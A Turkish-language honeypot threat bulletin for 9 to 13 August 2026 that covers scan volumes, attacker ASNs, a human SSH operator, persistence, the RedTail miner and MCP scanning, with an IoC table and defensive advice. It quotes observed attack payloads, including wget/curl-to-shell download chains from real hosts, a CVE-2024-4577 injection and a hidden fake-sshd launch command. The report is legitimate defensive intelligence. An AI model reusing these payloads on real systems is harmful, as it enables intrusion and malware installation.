← Tüm Yazılar
IOC RAPORUHIGH13 Ağustos 2026 · 16 dk okuma

Bülten 9-13 Ağustos: Zirve Sanılan Şey Plato Çıktı, Bir Operatör Klavye Düzenini Değiştirmeyi Unuttu

8 Ağustos'ta başlayan sel geri çekilmedi: günlük hacim 20,4 milyon olayda oturdu, bu 8 Ağustos seviyesinin tam iki katı. Dört hedef port da aynı 2,03 katsayısıyla büyüdü, yedi Türk barındırma ASN'inin payları birebir aynı kaldı, benzersiz kaynak IP sayısı ise hiç artmadı. Aynı pencerede bir insan operatör 40 dakika sahnede kaldı ve kimliğini bir klavye düzeni kazasıyla ele verdi.

Analiz: Erdem Özyurt · SiberKale Tellal

İçindekiler 21

9 Ağustos 13:00 ile 13 Ağustos 05:20 UTC arasında SiberKale honeypot ağına 74.560.792 olay geldi ve günlük hacim 20,4 milyonda sabitlendi. Bu, 8 Ağustos seviyesinin tam iki katı. Benzersiz kaynak IP sayısı ise artmadı: 12.963. Filo büyümedi, hızını ikiye katladı. Aynı pencerede bir insan operatör 40 dakika sahnede kaldı.

📅Veri dönemi: 9 Ağustos 13:00 – 13 Ağustos 05:20 UTC 2026 · ham sensör logları (tam pencere) + IoC veritabanı · OPSEC-filtreli

Yönetici Özeti

20,4Mgünlük olay (plato)
12.963benzersiz kaynak IP (artmadı)
195yeni IoC (4 günde)
1insan operatör (19.978 oturumda)

9 Ağustos bülteni 8 Ağustos’u “zirve” diye yazmıştı: tek günde 10,1 milyon olay, önceki beş günün toplamının sekiz katı. Bu pencere o kelimeyi düzeltiyor. 8 Ağustos zirve değil, eşikti. Hacim geri çekilmedi, iki katına çıkıp orada durdu.

Dönemin beş bulgusu:

  1. Plato, zirve değil. 10 Ağustos’tan itibaren günlük hacim 20,4 milyonda üç gün üst üste %0,4 içinde sabit. Dört hedef port da aynı 2,03 katsayısıyla büyüdü.
  2. Filo sabit, hız arttı. Benzersiz kaynak IP 8 Ağustos’ta 12.030, 12 Ağustos’ta 11.497. Hacim iki katına çıkarken IP sayısı hafifçe düştü. Dört günde veritabanına giren yeni gösterge sayısı yalnız 195.
  3. Kompozisyon donmuş. Yedi Türk barındırma ASN’inin pay yüzdeleri iki pencerede neredeyse birebir aynı. Tek operasyon, aynı tedarik zinciri.
  4. Bir operatör kendini klavyesiyle ele verdi. 19.978 oturumun biri insandı: 40 dakika, dokuz oturum, 49 komut. Kimliğini bir parola denemesinde bıraktı, ayrıntısı aşağıda.
  5. Yeni bir yüzey taranmaya başladı. Honeypot verimizde ilk kez bir MCP (Model Context Protocol) sunucu taraması kaydedildi. AI araç zincirleri artık tarama listesinde.
ℹ️ Veri Notu

Bu bülten tek katmanlıdır: pencere hem ham sensör retention'ı hem IoC veritabanı içinde kaldığı için bütün rakamlar aynı kaynaktan gelir. Ham hacim rakamlarına pasif parmak izi modülü P0f dahildir ve toplamın %75,8'ini üretir. İç/yönetim trafiği, RFC1918/CGNAT ve bilinen operasyonel kaynaklar tüm tablo ve listelerden çıkarılmıştır; çıkarma filtresi bilinen-pozitif üzerinde sınanmıştır. Saldırgan payload'larında geçen sensör adresleri maskelenmiştir. Önceki bültenle kıyaslar yeniden ölçülmüş taban değerlerle yapılmıştır, gerekçesi sonda.


1. Zirve Sanılan Şey Plato Çıktı

Günlük hacim tablosu dönemin şeklini tek bakışta veriyor:

GünToplam olaySuricataBenzersiz kaynak IP
6 Ağustos101.114691
7 Ağustos105.6322.955
8 Ağustos10.064.06412.030
9 Ağustos16.899.2362.108.27611.407
10 Ağustos20.356.0044.883.20811.483
11 Ağustos20.420.2414.917.66311.744
12 Ağustos20.431.9404.919.59311.497
13 Ağustos (05:20’ye)4.529.8551.089.89311.061

6 ve 7 Ağustos taban seviyesidir: günde yüz bin civarı olay. 8 Ağustos’ta hacim yüz kata yakın arttı, 9 Ağustos’ta tırmanmaya devam etti ve 10 Ağustos’tan itibaren 20,4 milyonda oturdu. Üç gün üst üste fark %0,4’ün altında. Bu bir dalga değil, açılıp bırakılmış bir vana.

Port kırılımı bunun tek bir altyapıdan geldiğini gösteriyor:

PortServisPencere toplamı8 Ağustos12 AğustosKat
3306MySQL21.174.5652.862.9495.803.8682,03
22SSH17.872.7802.404.6694.906.8202,04
80HTTP17.696.3132.394.3264.840.4662,02
443HTTPS17.688.0832.386.2634.847.1672,03

Dört bağımsız portun aynı katsayıyla büyümesi rastlantı değil. İlk dört port toplamın %99,8’ini oluşturuyor. Kuyrukta 8080 (20.626), SMTP 25 (12.502), IMAPS 993 (2.513) ve POP3 110 (1.770) var.

MySQL 3306 birinciliğini korudu ve Suricata’nın en çok gördüğü imza yine aynı:

Hitİmza
3.492.944ET SCAN Suspicious inbound to mySQL port 3306
298.137SURICATA STREAM Packet with broken ack
86.264ET DROP Spamhaus DROP Listed Traffic Inbound group 2
3.230ET INFO SSH session in progress on Expected Port
1.497ET INFO SSH-2.0-Go version string Observed
974ET TOR Known Tor Relay/Router (Not Exit) group 462
854ET SCAN Potential SSH Scan
782ET INFO Request to Hidden Environment File Inbound
728ET HUNTING PHP Filter Chains in HTTP URI
563ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 (CVE-2024-3721)

MySQL imzası 8 Ağustos’ta 472.441, 12 Ağustos’ta 956.853 hit üretti. Yine 2,03. Ağ katmanındaki her ölçüm aynı çarpanı veriyor.


2. Filo Büyümedi, Hızını İkiye Katladı

Bu pencerenin en önemli bulgusu bir artış değil, artmayan bir sayı.

Hacim iki katına çıktı. Benzersiz kaynak IP sayısı çıkmadı: 8 Ağustos’ta 12.030, 12 Ağustos’ta 11.497. Yani IP başına yoğunluk ikiye katlandı. Bu büyüyen bir botnet değil, sabit bir filonun gaza basması.

IoC veritabanı tarafı aynı şeyi söylüyor. Dört günlük pencerede eklenen yeni gösterge sayısı 195:

ÜlkeYeni IoC
TR40
US36
BE15
CN14
DE10
VN9
SG8
CZ6

74,5 milyon olay üreten 12.963 IP’nin yalnız 195’i feed’imizde yeni. Geri kalanı zaten tanıdığımız adresler. Bir önceki bültende dört haftada 19.038 yeni gösterge girmişti; bu pencerede günlük ortalama 50’nin altına indi.

Bunun savunma açısından anlamı şu: engelleme listesi tazeliği bu kampanyada belirleyici değil. Aynı adresler günlerdir dönüyor, yani bir hafta önceki liste bugün de büyük ölçüde geçerli. Buna karşılık tek tek IP engellemek işe yaramıyor, çünkü hacim IP sayısından değil IP başına yoğunluktan geliyor.


3. Kompozisyon Donmuş: Aynı Yedi ASN, Aynı Paylar

Kaynak ASN dağılımı iki pencere arasında yüzde noktası düzeyinde aynı kaldı:

ASNBu pencerePayÖnceki pencerePay
SPDNet Telekomünikasyon45.293.284%60,711.588.573%63,2
HostLAB Bilişim10.520.661%14,12.572.736%14,0
Yiğit Hosting5.271.542%7,071.287.391%7,0
AE Olfe Teknoloji3.516.216%4,72853.231%4,65
Olfe Veri Merkezi2.045.105%2,74452.416%2,47
Etkin Host1.758.764%2,36428.156%2,33
Bayram Coşkun1.756.471%2,36425.576%2,32

Yedi ASN’in hiçbiri kaybolmadı, hiçbiri sıra değiştirmedi ve payları neredeyse sabit. Hacim dört katına çıkarken kompozisyonun bu kadar korunması tek bir operasyonun ölçek büyütmesi demektir. Farklı aktörler olsaydı paylar kayardı.

Ülke dağılımında Türkiye 49.440.156 olayla %66,3, ardından Çekya (8.763.724), ABD (7.152.106) ve Rusya (7.032.048) geliyor. SPDNet’e atfedilen bloklar üç ülkeye yayılmış durumda, yani ABD ve Çekya hacminin büyük kısmı aynı ASN’in farklı kayıtlı bloklarından geliyor.

Her bültende tekrarladığımız uyarı geçerliliğini koruyor: bu tablo saldırıların Türkiye’den yönetildiği anlamına gelmiyor. Bunlar Türk bulut sağlayıcılarında saatlik kiralanmış tarama düğümleri. Türkiye’nin buradaki yeri hedef değil, ucuz ve hızlı tedarik edilebilen altyapı.

Yeni yükselen küme: TechTies

Kaynak IP sıralamasında dikkat çeken bir yapı var. En yoğun 15 IP’nin sekizi tek bir ASN’e ait ve hepsi yalnız SSH’a vuruyor:

IPOlayASN / ÜlkeBaskın port
154.57.209.19978.760Trans World Enterprise / Pakistan22
194.180.49.3744.254MEVSPACE / Bulgaristan80, 443
213.209.159.11525.320Feo Prest SRL / Tayvan3306 (tamamı)
195.178.110.2818.118Techoff Srv / Bulgaristan80, 8080
77.239.124.25210.791Banatsync Srl / Hollanda22
91.92.42.1010.601TechTies Inc. / Hollanda22
91.92.42.22710.528TechTies Inc. / Hollanda22
91.92.40.15310.476TechTies Inc. / Hollanda22
91.92.42.3610.449TechTies Inc. / Hollanda22
91.92.47.6610.448TechTies Inc. / Hollanda22
91.92.47.12310.421TechTies Inc. / Hollanda22
45.153.34.18610.229TechTies Inc. / Hollanda22
45.153.34.18110.102TechTies Inc. / Hollanda22
64.89.160.397.455Ghosty Networks / ABD25 (tamamı)
194.62.118.917.234Olfe Veri Merkezi / Türkiye3306, 80, 22

TechTies kümesinin sekiz IP’si 10.102 ile 10.601 arasında, yani neredeyse eşit yükle çalışıyor. Bu, tek yönetimden koşan bir SSH brute-force filosunun imzası. TechTies bu pencerede 95.315 olay üretti, önceki pencerede 62.020’ydi.

213.209.159.115 ise önceki bültende de MySQL taramasının lider kaynağıydı ve hâlâ aynı işi yapıyor: 25.320 olayının tamamı 3306’ya.


4. Bir İnsan Operatör: 40 Dakika ve Bir Klavye Düzeni Kazası

SSH potunda pencere boyunca 19.978 oturum, 577 benzersiz kaynak ve 18.165 başarısız girişe karşılık 426 başarılı giriş var. Komut yazan IP sayısı 111. Bunların tam olarak biri insan.

Kaynak 104.28.162.134 (Cloudflare aralığı, gerçek çıkış maskeli), 9 Ağustos 23:57:42 ile 10 Ağustos 00:37:40 UTC arasında dokuz oturum açtı ve 49 komut yazdı. İstemci banner’ı her seferinde SSH-2.0-OpenSSH_for_Windows_9.5, yani Windows’un yerleşik SSH istemcisi.

Kimliğini nasıl ele verdi

Yedinci oturumda bir parola denemesi şöyle kaydedildi:

00:23:40  login.failed   root / اثاثاخاخ#123
00:23:54  login.success  root / (boş parola)

Bu dizi rastgele değil. Arapça 101 klavye düzeninde h tuşu ا, e tuşu ث, o tuşu خ harfini basar. Yani h-e-h-e-h-o-h-o sırası ekrana اثاثاخاخ olarak düşer. Operatör aynı parolayı diğer oturumlarda hehehoho#123 diye yazmıştı.

Olan şu: operatör klavye düzenini İngilizceye almayı unuttu, parolayı yazdı, tutmadı, düzeni düzeltip aynı parolayı yeniden yazdı. Bir betiğin, bir sözlüğün veya bir botnet playbook’unun üretebileceği bir hata değil. Klavye başında biri var ve Arapça düzen kullanıyor.

İlk oturumda denediği parola ise Mehmet@123 idi. İki parola, iki farklı insan alışkanlığı kalıbı.

Ritim: makineyle karşılaştırma

49 komut arasındaki bekleme süreleri ölçüldü ve aynı pencereden bir botnet oturumuyla kıyaslandı:

Ölçümİnsan operatörBotnet (kıyas)
En kısa aralık1,46 sn0,00 sn
Medyan aralık8,00 sn0,74 sn
En uzun aralık96,55 sn
1 saniyenin altıhiç%95

İnsan hiçbir komutta 1,46 saniyenin altına inmedi; botnet neredeyse hiç üstüne çıkmadı. İki dağılım hiç örtüşmüyor.

Yaptığı işler

Oturum akışının özeti, saatler UTC:

23:57:58  giriş (boş parola) · Terminal Size: 100x25
23:59:05  lscpu | grep -E "Model name|CPU\(s\)|MHz"     (+66,4 sn)
23:59:10  free -h                                        (+5,3 sn)
23:59:20  df -h                                          (+10,3 sn)
23:59:41  passwd                                         (+21,2 sn)
23:59:58  passwd                                         (tekrar)
00:00:57  cat /etc/os-release | grep PRETTY_NAME
00:16:15  dnf install fastfetch -y                       ← dört kez, azalan aralıkla
00:17:30  dnf install fastfetch -ydnf install epel-release -y   ← yapıştırma kazası
00:18:10  install fastfetch                              ← baştaki dnf düşmüş
00:20:58  dnf -y install epel-release                    ← bayrağın yerini değiştirdi
00:21:02  echo hello                                     ← kabuk canlı mı testi
00:21:58  touch /tmp/test.txt && echo " " || echo "  "   ← yazma yetkisi testi
00:24:00  systemd-detect-virt                            ← sanal makinede miyim
00:25:27  https://ipinfo.io/<sensör adresi>              ← yanlış pencereye yazdı (+82,2 sn)
00:29:46  which fsck → ls -la /sbin/fsck → file /sbin/fsck → /usr/sbin/fsck --version
00:32:11  ls -la /                                       (+96,6 sn, en uzun düşünme)
00:35:38  dnf removw                                     ← yazım hatası
00:35:46  dnf install nano                               ← editör kurma denemesi
00:37:39  son oturum kapandı, bir daha dönmedi

Bu tabloda bir insanın imzası olan altı ayrı davranış var. Yazım hataları ve kendini düzeltme: dnf removw, yarım kalmış install fastfetch, bayrağı öne alarak yeniden deneme. Yapıştırma kazası: iki komut tek satırda birleşmiş. Yanlış pencereye yazma: kabuğu tarayıcının adres çubuğu sanıp makinenin kendi adresini sorgulamaya kalkmış, hem de 82 saniye düşündükten sonra. Sinirlenme eğrisi: aynı komutu dört kez, 38 → 30 → 19 → 15 saniye aralıklarla tekrarlamış. Ortam testi: echo hello ile kabuğun canlı olup olmadığını, touch ile yazma yetkisini yoklamış. Vazgeçme: paket yöneticisi cevap vermedikçe kopup yeniden bağlanmış, dokuz oturum bu yüzden var.

Beşinci oturumda parolayı altı kez yanlış girdi ve bir denemede parola alanına komutunu yazdı (root / dnf install epel-release -y). Pencere karışıklığı, tanıdık bir insan hatası.

Niyet de okunuyor. lscpu, free -h, df -h üçlüsü tek bir soruya cevap arar: bu makine işime yarar mı? Ardından passwd ile kapıyı arkasından kilitleme girişimi, sonra fsck ve lsblk ile disk yapısını anlama çabası geliyor. Bot playbook’u kalıcılık için authorized_keys kullanır; bir insan passwd çağırır.

PuTTY yalanı bir kez daha

Önceki bülten “insan istemcisi beyan eden IP’yi ara” sezgisinin işe yaramadığını yazmıştı. Bu pencerede aynı ders ikinci kez doğrulandı: 19 IP insan istemcisi beyan etti, 16’sı hiç komut çalıştırmadı.

Terminal penceresi boyutu bildiren toplam 11 kayıttan sekizi yukarıdaki operatöre ait. Kalan üçü 23.160.56.10 adresinden ve bu bir bot:

16:09:31  bağlantı · SSH-2.0-PUTTY          ← sahte banner
16:09:32  login SUCCESS   root / 123456
16:09:33  Terminal Size: 80x24
16:09:33  #!/bin/sh; wdir="/tmp"; for i in "/dev/shm" "/tmp" "/var/tmp" "/home"...
16:10:39  SFTP ile yükleme: skhqwensw
16:10:40  /bin/skhqwensw                    ← çalıştırma denemesi, başarısız
16:10:41  ls -la /var/run/gcc.pid           ← rakip enfeksiyon yoklaması
16:10:41  oturum kapandı (70 saniye)

Banner sahte: gerçek PuTTY SSH-2.0-PuTTY_Release_0.84 yazar ve o da bu pencerede ayrı üç IP’de görülüyor. Komutlar arası aralık 0,00 saniye. Üç terminal boyutu bildirimi bir insanın pencereyi yeniden boyutlandırması değil, üç ayrı yürütme kanalının PTY tahsisi.

Sonuç: terminal boyutu bildirimi ve istemci banner’ı tek başına insan kanıtı değil. İnsanı ayıran şey ritim, yazım hatası ve playbook dışı davranış.

⚠️ Bir netleştirme

Bu pencerede brute-force sözlüklerinde Erdem@2022 ve Erdem@2024 gibi Türkçe isim kalıplı parolalar da denendi. Bunlar bizim parolalarımız değildir, saldırganın Türk IP bloğuna göre uyarladığı tahminlerdir. Aynı sözlükte claude kullanıcı adı 94 kez denendi; AI araç adlarının sözlüklere girmesi Temmuz'dan beri sürüyor.


5. Kalıcılık: Tek Bir Anahtar 76 Kez Yazıldı

Bu pencerede en çok tekrarlanan tek artefakt bir dosya değil, bir SSH açık anahtarı.

Dosya yazma kayıtlarının dağılımı:

HedefAdet
/root/.ssh/authorized_keys32
/etc/hosts.deny (boş satırla sıfırlanıyor)31
/home/<çeşitli kullanıcı>/.ssh/authorized_keys1-3’er

Yazılan anahtarın SHA-256 özeti a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 ve pencerede 76 kez görüldü. Farklı IP’ler, farklı kullanıcı dizinleri, aynı anahtar. Yani birden fazla düğüm aynı operatörün geri dönüş kapısını kuruyor.

/etc/hosts.deny dosyasının boş satırla ezilmesi de aynı playbook’un parçası: saldırgan kendisinden önce gelen erişim kısıtlarını temizliyor. Yanında rm -rf /tmp/secure.sh, pkill -9 auth.sh gibi rakip temizleme komutları geliyor (31 kez).

Sistem envanteri şablonu neredeyse değişmedi ve hâlâ aynı satırla başlıyor:

cd ~; chattr -ia .ssh; lockr -ia .ssh        (78 kez)
uname -a                                      (78)
cat /proc/cpuinfo | grep name | wc -l         (75)
crontab -l / df -h / free -m / top / w / whoami / which ls   (74'er)
lscpu | grep Model                            (73)

1.842 komut girişi yalnız 195 farklı komut içeriyor ve bu sayı oturum sayısına eşit. Yani tek bir şablon tekrarlanıyor.

Bir de parola ele geçirme kalıbı var: onlarca IP echo "root:<rastgele>" | chpasswd ve echo "<eski>\n<rastgele>\n<rastgele>\n" | passwd çalıştırdı. Nadir görünen komutların çoğu bu şablonun rastgele dizeli varyasyonları.


6. RedTail Kesintisiz, Teslim Yöntemi Değişti

RedTail madenci seti önceki pencereyle birebir aynı: beş mimari, aynı iki dağıtım hostu.

DosyaSHA-256 (ilk 20)Kaynak
redtail.arm7d70f917e35813a7ae323130.12.180.51 · 77.90.185.20
redtail.arm8d1cac82f44b54b0fd244aynı ikisi
redtail.i6868e1a67a5c03b3cd818f0aynı ikisi
redtail.riscv3f3bf218089d1488617daynı ikisi
redtail.x86_64f0aa83bbbd2c75e2f71eaynı ikisi
setup.sh1e70b63472772e3f5092aynı ikisi
clean.sh3f3a11bafabb1a35db91aynı ikisi

Değişen şey teslim yöntemi: önceki pencerede dosyalar HTTP ile indiriliyordu, bu pencerede tamamı SFTP ile yüklendi. Cowrie tarafında indirme URL’si alanı boş kaldı, yani wget ve curl zincirinden vazgeçilmiş. Savunma açısından anlamı önemli: çıkış trafiğinde wget arayan bir tespit kuralı bu dalgayı kaçırır.

Bir de isim kamuflajı var. Beş farklı kaynaktan sshd adıyla ikili yüklendi:

ZamanKaynakSHA (ilk 20)
10 Ağu 04:55122.225.202.130c5241b375440a0dc96b2
11 Ağu 12:25158.51.96.381ff7c192f591fe63fae4
11 Ağu 12:4161.240.17.661ff7c192f591fe63fae4
11 Ağu 13:24213.215.209.101aynı aile
11 Ağu 22:1349.173.65.19aynı aile

Çalıştırma komutu gizli sayısal bir dizinden geliyor:

chmod +x ./.1924026081157900083/sshd; nohup ./.1924026081157900083/sshd &

Bir süreç listesinde sshd görmek kimseyi rahatsız etmez, tam olarak bu yüzden seçilmiş bir isim. Savunma tarafında karşılığı net: süreç adına değil yoluna bakın. Gerçek sshd /usr/sbin/sshd üzerinden çalışır; nokta ile başlayan gizli bir dizinden çalışan sshd tanım gereği sahtedir.

Yeni bir dağıtım hostu da kayda geçti: 5.182.210.174 (tek kez, /tmp/ok zinciri).


7. Web Tarafı: SOSTREA Devam Ediyor, MCP Yüzeyi Taranmaya Başladı

Web potları pencerede 6.640 ve 6.000 olay kaydetti. İstenen yolların dağılımı iki şey söylüyor.

SOSTREA hâlâ sahada. En çok istenen yol, üçüncü bültendir aynı CCTV/DVR komut enjeksiyonu:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; rm bbc;
wget http://109.248.160.75/bbc; chmod 777 bbc; ...        (529 istek)

İndirme hostu bu pencerede 109.248.160.75. Kampanya ne durdu ne altyapısını değiştirdi.

Ardından klasik keşif geliyor: .env sızdırma denemeleri (35), ve phpinfo ailesinin onlarca varyantı (/phpinfo.php, /info.php, /admin/phpinfo.php, /cpanel/phpinfo.php, /cgi-bin/phpinfo.cgi ve benzeri, her biri 28-34 istek).

Kendini yayan PHP-CGI zinciri. Payload’lar arasında CVE-2024-4577 istismarı var ve içindeki etiket kampanyanın kendi adını veriyor:

<?php shell_exec(base64_decode(...)) →
(wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk
 https://217.60.195.113/sh) | sh -s cve_2024_4577

Yanında apache.selfrep etiketli düz varyantı da geliyor, yani zincir kendini çoğaltmak üzere kurulmuş.

Diğer payload’lar: router ve NAS arka kapılarını yoklayan cmd=echo KEYWORD_TEST kalıbı (40), env sızdırma denemeleri (16), GraphQL introspection sorgusu (7), AndroxGh0st imzası (4), F5 BIG-IP iControl RCE (cat /config/bigip.conf; env, 3) ve Laravel Ignition RCE zincirleri (4).

Yeni yüzey: MCP sunucu taraması

Bu pencerenin en dikkat çekici yeni kaydı beş istekten oluşuyor:

{"jsonrpc":"2.0","method":"initialize","params":{"protocolVersion":"2025-06-18",
 "capabilities":{"sampling":{},"elicitation":{},"roots":{...}},
 "clientInfo":{"name":"internet…"}}}

Bu bir Model Context Protocol el sıkışmasıdır. Birisi internette açıkta bırakılmış MCP sunucusu arıyor ve bulduğunda yetenek listesini istiyor. Protokol sürümü 2025-06-18, istemci adı bir tarama aracına işaret ediyor.

Honeypot verimizde bunu ilk kez görüyoruz ve önemi hacminde değil: AI araç zincirleri artık jenerik tarama setinin parçası. MCP sunucuları tanımı gereği dosya sistemi, veritabanı ve API erişimi taşıyan köprülerdir; kimlik doğrulaması olmadan internete açılmış bir MCP sunucusu, arkasındaki her araca açılmış bir kapıdır. Bu satır bugün beş istek, altı ay sonra bir kampanya olur.

Telegram oturumu çalan tarayıcı

Ayrı bir aktör sınıfı da var. libssh2 kütüphanesi kullanan üç IP (109.241.134.137, 161.118.212.147, 121.183.240.55) dokuz komutluk sabit bir dizi çalıştırıyor ve aradıkları şey madenci değil: Telegram Desktop’ın tdata dizini, D877F783D5D3EF8C anahtar dosyası ve GSM modem aygıtları (/dev/ttyGSM*, /dev/ttyUSB-mod*).

Yani bu küme kripto kazmıyor, oturum ve kimlik çalıyor. Bir sunucuda Telegram Desktop profili bulmak, o hesabın tamamına erişmek demektir.


8. MySQL Selinde Tek Bir Şey Değişmedi: Protokol Etkileşimi

Ağ katmanında MySQL trafiği iki katına çıktı. MySQL potuna düşen gerçek protokol etkileşimi ise hiç değişmedi.

Pencerede 3.790 etkileşim kaydedildi, günlük yaklaşık bin. Önceki pencerede 3.592’ydi. Denenen kullanıcılar:

KullanıcıDeneme
root1.258
admin1.186
sa1.182
bob20
(boş)3
mysql1

Parolaların tamamı yine boş dize. Tek dosya yükleme, tek elle yazılmış SQL komutu yok. bob ve mysql bu pencerede ilk kez göründü.

Bu iki sayının birlikte okunması önemli: 21,1 milyon ağ olayı, 3.790 protokol etkileşimi. Yani trafiğin neredeyse tamamı bağlantı taraması, oturum denemesi değil. Saldırgan portun açık olup olmadığını sayıyor, içeri girmeye çalışmıyor. Önceki bültende bunu envanter operasyonu diye adlandırmıştık; ölçek dört katına çıkmasına rağmen niteliği aynı kaldı.


9. Kaybolanlar ve 2026 CVE’leri

Negatif sonuçlar da bulgudur ve bu pencerede üç tanesi kayda değer.

Telnet sıfır. Önceki pencerede telnet üzerinden gelen oturumlar vardı; bu pencerede SSH potuna düşen 101.539 olayın tamamı SSH, telnet tek olay üretmedi.

SMTP’de insan eli yok. Önceki bültende bir operatör alıcı adresini elle değiştiriyor ve protonmal.com yazım hatası yapıyordu. Bu pencerede SMTP hacminin %90’ı tek IP’den (64.89.160.39, 3.247 olay) geliyor ve tamamı tek düze bir AUTH LOGIN döngüsü. Görülen dört alıcı adresinin dördü de araç imzalı: [email protected] bilinen açık röle test adresi (gövdesinde Delphi/Indy kütüphane imzası var), diğerleri rastgele onaltılık alan adları.

Terminal ortam değişkeni sızıntısı tekrarlanmadı. Önceki bültenin LC_TERMINAL=iTerm2 bulgusu bu pencerede aranıp bulunamadı; sekiz farklı terminal emülatörü adı için yapılan tarama sıfır sonuç verdi. Sebebi basit: bu operatör macOS değil Windows istemcisi kullandı, o imzayı bırakmadı. Aynı bulguya iki kez aynı yoldan varılmıyor.

İstismar imzalarında ise bileşim değişiyor:

HitCVE / İmza
563TBK DVR-4104/4216 Command Injection (CVE-2024-3721)
27Dovecot Memory Corruption (CVE-2019-11500)
17PHP-CGI OS Command Injection (CVE-2024-4577)
14Apache 2.4.49 Path Traversal (CVE-2021-41773)
6LB-Link Command Injection (CVE-2023-26801)
4Cisco IOS XE Auth Bypass (CVE-2023-20198)
4React Server Components React2Shell (CVE-2025-55182)
3Linksys E-Series (CVE-2025-34037)
2IBM Langflow Auto-Login Bypass (CVE-2026-9198)
2WordPress Gravity SMTP (CVE-2026-4020)
1WordPress wp2shell (CVE-2026-63030, CVE-2026-60137)

TBK DVR istismarı tek başına diğer tüm CVE’lerin toplamının dört katı. Ama dikkat çeken kalem 2026 CVE’leri: Langflow, Gravity SMTP ve wp2shell tek haneli hitlerle de olsa zaten sahada. Bir zafiyetin tarama hacmine girmesi için popüler olması gerekmiyor, otomasyona girmesi yeterli. Langflow’un bu listede olması, MCP taramasıyla birlikte okunduğunda aynı yöne işaret ediyor: AI altyapısı artık hedef yüzeyi.


IoC Tablosu: 9-13 Ağustos Penceresi

IoCTürBağlamÖncelik
a8460f446be5404100…1669f8f2SSH anahtarı76 kez yazıldı, pencerenin en yaygın kalıcılık artefaktıhigh
104.28.162.134IPİnsan operatör, Windows istemcisi, Arapça klavye kazası, passwd girişimihigh
23.160.56.10IPPuTTY banner’ı sahteleyen dropper botu, skhqwensw yükledihigh
130.12.180.51, 77.90.185.20IPRedTail dağıtım hostları, üçüncü bültendir sabithigh
109.248.160.75IPSOSTREA bbc indirme hostuhigh
217.60.195.113IPCVE-2024-4577 kendini yayan zincir hostuhigh
5.182.210.174IPYeni dağıtım hostu (/tmp/ok)medium
213.209.159.115IPMySQL envanter taramasının lider kaynağı, tamamı 3306high
91.92.42.10, 91.92.42.227, 91.92.40.153, 91.92.42.36, 91.92.47.66, 91.92.47.123, 45.153.34.186, 45.153.34.181IPTechTies SSH brute-force filosu, eşit yüklü sekiz düğümhigh
109.241.134.137, 161.118.212.147, 121.183.240.55IPTelegram tdata ve GSM modem arayan kimlik hırsızı kümehigh
154.57.209.199IPPencerenin en yoğun kaynağı, 78.760 olay, SSHmedium
64.89.160.39IPSMTP AUTH LOGIN döngüsü, hacmin %90’ımedium
redtail.{arm7,arm8,i686,riscv,x86_64}DosyaÇok mimarili madenci seti, SFTP ile teslimhigh
sshd (gizli sayısal dizinden)Dosyaİsim kamuflajı, beş bağımsız kaynakhigh
D877F783D5D3EF8C, tdataArtefaktTelegram Desktop oturum çalma hedefihigh
/var/run/gcc.pidArtefaktBotnet mutex, rakip enfeksiyon yoklamasımedium
___S_O_S_T_R_E_A_MAX___PayloadSOSTREA CCTV/DVR komut enjeksiyonu imzasıhigh
jsonrpc initialize + protocolVersion 2025-06-18PayloadMCP sunucu taraması, feed’de ilkmedium
Mehmet@123, hehehoho#123, اثاثاخاخ#123Credentialİnsan operatörün denemeleri (üçüncüsü klavye kazası)medium

IOC’lar savunma amaçlı paylaşılır. Bu dönemin dersi: hacim arttığında yeni aktör aramayın, aynı aktörün hızına bakın.


Savunma Öncelikleri

  1. authorized_keys dosyalarını izlemeye alın. Bu pencerenin en yaygın artefaktı tek bir açık anahtarın 76 kez yazılmasıydı. /root/.ssh/ ve tüm /home/*/.ssh/ altındaki değişiklikler dosya bütünlüğü izlemesine girmeli; bir anahtar eklendiğinde alarm üretmeli. Parola değiştirmek gürültülüdür, anahtar eklemek sessizdir.
  2. passwd ve chpasswd çağrılarını alarma bağlayın (yeni). Bot playbook’u authorized_keys yazar, insan passwd çalıştırır. Beklenmedik bir parola değişikliği, arkasında klavye başında biri olduğunun en temiz göstergesidir.
  3. Süreç adına değil yoluna bakın. Gizli sayısal bir dizinden çalışan sshd gerçek değildir. /tmp, /dev/shm ve /var/tmp dizinlerini noexec ile bağlamak tek satırlık bir savunmadır.
  4. wget aramayı bırakın, SFTP’yi de izleyin. RedTail bu pencerede HTTP indirmesini bıraktı, dosyaları SFTP ile yükledi. Yalnız çıkış HTTP trafiğine bakan tespit kuralları bu dalgayı görmez.
  5. MCP sunucularınızı internete açık bırakmayın (yeni). Feed’imizde ilk MCP tarama kaydı bu pencerede göründü. Bir MCP sunucusu dosya sistemi ve API erişimi taşır; kimlik doğrulaması olmadan yayınlanmış olanı, arkasındaki her araca açılmış kapı sayın. Aynı hafta Langflow zafiyetinin de taranıyor olması rastlantı değil.
  6. Boş parolayı bugün kapatın. İnsan operatör de bot da içeri boş veya varsayılan parolayla girdi. SSH’ta parola kimlik doğrulaması tamamen kapatılmalı.
  7. ASN düzeyinde skorlayın, IP düzeyinde değil. Hacim IP sayısından değil IP başına yoğunluktan geliyor; yedi ASN toplamın büyük çoğunluğunu üretiyor ve kompozisyon donmuş durumda.
  8. İnternete açık MySQL’i kapatın. Selin hedefi hâlâ 3306 ve amacı hâlâ envanter. Nasıl kapatılacağı ayrı bir yazının konusu: MySQL portunu kapattığınızı sanıyorsunuz. Kurumsal ölçekte denetim çerçevesi: veritabanı maruziyetinin kurumsal denetimi.

Sonuç

Beş bülten boyunca aynı cümleyi kurduk: aktörler altyapıyı hızla eskitiyor, davranışı hiç değiştirmiyor. Bu pencere cümleye üçüncü bir katman ekledi.

Altyapı bu kez eskitilmedi bile. Aynı yedi ASN, aynı paylar, aynı IP havuzu, aynı iki dağıtım hostu, aynı beş mimarili madenci seti. Değişen tek şey hız oldu ve tam iki katına çıktı. Dört ayrı portta, iki ayrı ölçüm katmanında, aynı 2,03 katsayısı.

Bunun savunma açısından anlamı rahatlatıcı değil, tersine. Bir kampanya yeni düğüm eklemeden hacmini ikiye katlayabiliyorsa, elindeki kapasitenin tamamını kullanmıyordu demektir. Bugün gördüğümüz plato bir tavan değil, bir ayar.

